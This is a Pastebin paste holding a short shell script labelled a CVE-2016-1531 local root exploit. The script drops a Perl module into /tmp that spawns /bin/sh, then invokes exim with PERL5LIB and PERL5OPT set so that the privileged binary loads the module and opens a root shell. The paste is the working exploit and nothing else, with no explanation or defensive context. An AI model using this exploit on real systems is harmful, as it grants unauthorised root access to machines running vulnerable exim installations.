Advertisement
Guest User

Untitled

a guest
Feb 27th, 2020
112
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.19 KB | None | 0 0
  1. echo [ CVE-2016-1531 local root exploit
  2. cat > /tmp/root.pm << EOF
  3. package root;
  4. use strict;
  5. use warnings;
  6.  
  7. system("/bin/sh");
  8. EOF
  9. PERL5LIB=/tmp PERL5OPT=-Mroot /usr/exim/bin/exim -ps
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement